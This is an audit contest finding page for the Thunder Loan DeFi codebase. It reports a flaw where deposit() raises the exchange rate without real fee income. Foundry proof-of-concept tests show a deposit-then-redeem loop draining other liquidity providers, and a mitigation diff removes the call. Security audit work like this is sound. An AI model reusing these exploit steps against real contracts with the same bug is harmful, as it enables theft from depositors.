Thunder Loan

AI First Flight #7

Beginner FriendlyFoundryDeFiOracle

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H]Erroneous updateExchangeRate() call in deposit() inflates exchange rate without real fee income

huicanvie

Root + Impact

Description

When a user deposits tokens into the protocol, they should receive asset tokens (shares) proportional to the current exchange rate. The exchange rate should only increase when the protocol actually earns fee income — specifically when a flash loan is repaid with a fee, causing the underlying balance in the AssetToken contract to grow. A deposit is a principal contribution, not a fee-generating event, so it should not affect the exchange rate at all.
deposit() incorrectly calls AssetToken::updateExchangeRate() with a fictitious fee computed from the deposited amount. This fee is never actually received by the protocol — no extra underlying tokens enter the AssetToken contract as a result of the deposit. However, updateExchangeRate() uses this inflated fee to increase the exchange rate, making every existing share worth more underlying than it should be. Because the exchange rate rises without a corresponding increase in the actual underlying balance, a depositor can immediately redeem their newly minted shares at the higher rate and withdraw more tokens than they deposited, effectively stealing from other liquidity providers.

// Root cause in the codebase with @> marks to highlight the relevant section

function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {

assetToken.updateExchangeRate(calculatedFee);//@>Should not be called.

}

Risk

Likelihood: High

No special privileges are required; any address can call deposit()
The attack requires only two steps — deposit() followed immediately by redeem() — and can be executed atomically in a single transaction
There is no reliance on a specific chain state, time window, or external condition; the bug triggers deterministically on every deposit() call
The profit scales linearly with deposit size, giving a direct financial incentive to exploit it immediately after deployment

Impact: High

Every deposit() call inflates the exchange rate without a corresponding increase in the underlying token balance. When the attacker immediately calls redeem(), they withdraw more tokens than they deposited, with the shortfall taken directly from the pool funded by other liquidity providers.
The attack is repeatable. An attacker can loop deposit() + redeem() until the AssetToken contract's underlying balance is exhausted, completely draining all liquidity providers' funds.
Every honest liquidity provider who deposited before the attack suffers a pro-rata loss. Their shares still exist but the underlying backing them has been partially or fully stolen.

Proof of Concept

The attacker calls deposit() with any amount. Internally, deposit() computes a fictitious fee and passes it to updateExchangeRate(), inflating the exchange rate before any tokens have actually entered the pool.
The attacker immediately calls redeem() with the shares just received. Because the exchange rate is artificially high, they withdraw more underlying than they deposited.
The difference is taken from existing liquidity providers' funds. The attack can be repeated until the pool is drained.

function test_PoC_DepositUpdateExchangeRateDrain() public setAllowedToken hasDeposits {

// Snapshot the pool balance before attack

AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA);

uint256 poolBalanceBefore = tokenA.balanceOf(address(assetToken));

console.log("Pool tokenA balance before attack:", poolBalanceBefore);

// Attacker deposits AMOUNT — deposit() will mint shares AND incorrectly raise exchange rate

uint256 attackAmount = AMOUNT;

tokenA.mint(user, attackAmount);

vm.startPrank(user);

tokenA.approve(address(thunderLoan), attackAmount);

thunderLoan.deposit(tokenA, attackAmount);

// Exchange rate has been inflated; redeem all shares at the higher rate

uint256 attackerShares = assetToken.balanceOf(user);

console.log("Attacker shares received:", attackerShares);

uint256 attackerBalanceBefore = tokenA.balanceOf(user);

thunderLoan.redeem(tokenA, attackerShares);

vm.stopPrank();

uint256 attackerBalanceAfter = tokenA.balanceOf(user);

uint256 poolBalanceAfter = tokenA.balanceOf(address(assetToken));

console.log("Attacker tokenA after redeem:", attackerBalanceAfter);

console.log("Pool tokenA balance after attack:", poolBalanceAfter);

console.log("Attacker profit:", attackerBalanceAfter - attackerBalanceBefore);

// Attacker redeems more than they deposited — profit comes from other LPs

assertGt(attackerBalanceAfter, attackerBalanceBefore + attackAmount - 1,

"Attacker should recover more than deposited");

assertLt(poolBalanceAfter, poolBalanceBefore,

"Pool should have lost funds belonging to other LPs");

}

Recommended Mitigation

Remove the call to the updateExchangeRate function.

function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {

- uint256 calculatedFee = getCalculatedFee(token, amount);

- assetToken.updateExchangeRate(calculatedFee);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Updating exchange rate on token deposit will inflate asset token's exchange rate faster than expected

# Summary Exchange rate for asset token is updated on deposit. This means users can deposit (which will increase exchange rate), and then immediately withdraw more underlying tokens than they deposited. # Details Per documentation: > Liquidity providers can deposit assets into ThunderLoan and be given AssetTokens in return. **These AssetTokens gain interest over time depending on how often people take out flash loans!** Asset tokens gain interest when people take out flash loans with the underlying tokens. In current version of ThunderLoan, exchange rate is also updated when user deposits underlying tokens. This does not match with documentation and will end up causing exchange rate to increase on deposit. This will allow anyone who deposits to immediately withdraw and get more tokens back than they deposited. Underlying of any asset token can be completely drained in this manner. # Filename `src/protocol/ThunderLoan.sol` # Permalinks https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L153-L154 # Impact Users can deposit and immediately withdraw more funds. Since exchange rate is increased on deposit, they will withdraw more funds then they deposited without any flash loans being taken at all. # Recommendations It is recommended to not update exchange rate on deposits and updated it only when flash loans are taken, as per documentation. ```diff function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) { AssetToken assetToken = s_tokenToAssetToken[token]; uint256 exchangeRate = assetToken.getExchangeRate(); uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate; emit Deposit(msg.sender, token, amount); assetToken.mint(msg.sender, mintAmount); - uint256 calculatedFee = getCalculatedFee(token, amount); - assetToken.updateExchangeRate(calculatedFee); token.safeTransferFrom(msg.sender, address(assetToken), amount); } ``` # POC ```solidity function testExchangeRateUpdatedOnDeposit() public setAllowedToken { tokenA.mint(liquidityProvider, AMOUNT); tokenA.mint(user, AMOUNT); // deposit some tokenA into ThunderLoan vm.startPrank(liquidityProvider); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); // another user also makes a deposit vm.startPrank(user); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA); // after a deposit, asset token's exchange rate has aleady increased // this is only supposed to happen when users take flash loans with underlying assertGt(assetToken.getExchangeRate(), 1 * assetToken.EXCHANGE_RATE_PRECISION()); // now liquidityProvider withdraws and gets more back because exchange // rate is increased but no flash loans were taken out yet // repeatedly doing this could drain all underlying for any asset token vm.startPrank(liquidityProvider); thunderLoan.redeem(tokenA, assetToken.balanceOf(liquidityProvider)); vm.stopPrank(); assertGt(tokenA.balanceOf(liquidityProvider), AMOUNT); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!